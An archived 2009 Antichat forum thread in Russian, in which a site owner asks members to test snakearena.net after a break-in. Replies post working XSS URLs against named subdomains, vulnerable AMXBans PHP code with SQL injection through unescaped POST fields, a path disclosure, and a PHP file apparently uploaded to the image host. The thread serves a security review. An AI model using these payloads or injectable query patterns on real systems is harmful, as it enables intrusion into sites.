Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   SnakeArena.Net (https://forum.antichat.xyz/showthread.php?t=105278)

Love suit?! 08.02.2009 15:31

SnakeArena.Net
 
Здраствуйте, проект подвергался хак аттаке, но каким образом неясно, стоит 2 самописных мини двигла, Генератор юзербаров(http://monitor.snakearena.net) и Image Host( http://img.snakearena.net/ ), форум + главная паблик двиги, возможно ломают через эти 2? Баннер установил на главной странице в колонке справа.

BlackSun 09.02.2009 11:08

XSS
http://img.snakearena.net/v.php?id='><script>alert()</script>

http://amxbans.snakearena.net/ban_search.php
Есть подозрения на sql-inj:
PHP код:

if ((isset($_POST['nick'])) || (isset($_POST['steamid'])) || (isset($_POST['ip'])) || (isset($_POST['reason'])) || (isset($_POST['date'])) || (isset($_POST['timesbanned'])) || (isset($_POST['admin'])) || (isset($_POST['server']))) {

    
// Make the array for the active bans list
    
if (isset($_POST['nick'])) {
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip FROM $config->bans WHERE player_nick LIKE '%".$_POST['nick']."%' ORDER BY ban_created DESC") or die(mysql_error());
    } else if (isset(
$_POST['steamid'])) {
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip FROM $config->bans WHERE (player_id = '".$_POST['steamid']."' AND ban_type='S' ) OR ( player_ip='".$_POST['ip']."' AND ban_type='SI')  ORDER BY ban_created DESC") or die(mysql_error());
    } else if (isset(
$_POST['reason'])) {
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip FROM $config->bans WHERE ban_reason LIKE '%".$_POST['reason']."%' ORDER BY ban_created DESC") or die(mysql_error());
    } else if (isset(
$_POST['date'])) {
        
$date        substr_replace($_POST['date'], ''21);
        
$date        substr_replace($date''41);
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip FROM $config->bans WHERE FROM_UNIXTIME(ban_created,'%d%m%Y') LIKE '$date' ORDER BY ban_created DESC") or die(mysql_error());
    } else if (isset(
$_POST['timesbanned'])) {
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip, COUNT(*) FROM $config->bans GROUP BY player_id HAVING COUNT(*) >= '".$_POST['timesbanned']."' ORDER BY ban_created DESC") or die (mysql_error());
    } else if (isset(
$_POST['admin'])) {
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip FROM $config->bans WHERE admin_id = '".$_POST['admin']."' ORDER BY ban_created DESC") or die(mysql_error());
    } else if (isset(
$_POST['server'])) {
        
$resource3    mysql_query("SELECT bid, player_nick, admin_nick, ban_length, ban_reason, ban_created, server_ip FROM $config->bans WHERE server_ip = '".$_POST['server']."' ORDER BY ban_created DESC") or die(mysql_error());
    } else  {
        echo 
"KOE";
    } 

При magic_quotes = off так же возможна sql-inj в скриптах, инсклудяших include/accesscontrol.inc.php
PHP код:

if(isset($_POST['uid'])){
    
$_POST['uid'] = secure($_POST['uid']);
// функция secure зашищает только от xss

.................

if(isset(
$_COOKIE["amxbans"])) {
    
$sql "SELECT * FROM $config->webadmins WHERE username = '$uid' AND password = '$pwd'";
} else {
    
$sql "SELECT * FROM $config->webadmins WHERE username = '$uid' AND password = md5('$pwd')";



Love suit?! 09.02.2009 16:23

Цитата:

аххаха уже проайфремиили )
Проверил все страницы, не нашёл:( Насчёт img-hosta, догадки были, они оправдались, насчёт amxbans, magic_quotes = on

Godfather Bulan 09.02.2009 19:16

http://php-ru.info/down/open/fotohost.html
исходники твоего "самописного" хоста.
мб кому-то помогут

V.I.P 10.02.2009 07:23

Ахах,вы нашли друг друга)) http://forum.antichat.ru/thread105214.html

TreV@N 10.02.2009 08:36

Ошибка в скрипте.Раскрытие путей.

http://amxbans.snakearena.net/ban_details.php?bid=6177
-----------
XSS

http://amxbans.snakearena.net/ban_details.php?bid={XSS}

А потом ошибочка
Цитата:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '> ORDER BY date ASC' at line 1

TreV@N 12.02.2009 11:44

XSS

http://monitor.snakearena.net/server.php?bgcolor=%00"'><script%20%0a%0d>alert()% 3B</script>

FraiDex 12.02.2009 19:09

Проверяй не только расширения, добавь проверку по MIME-TYPE, надёжней будет.
http://img.snakearena.net/images/23117cmd.jpg - xss Правда работает только в IE, но сам факт...
http://img.snakearena.net/images/7622712.02.png -screen

Ponchik 16.02.2009 02:49

Гы гы гы, такойже файлобменик был у кофа :)
http://img.snakearena.net/images/13628sdgfg.php

ТС походу забил на тему

fatalo 24.02.2009 23:07

Пончек,не подскажешь в пм,как залил пхпинфо?Новая скуля,или которые выше?


Время: 01:52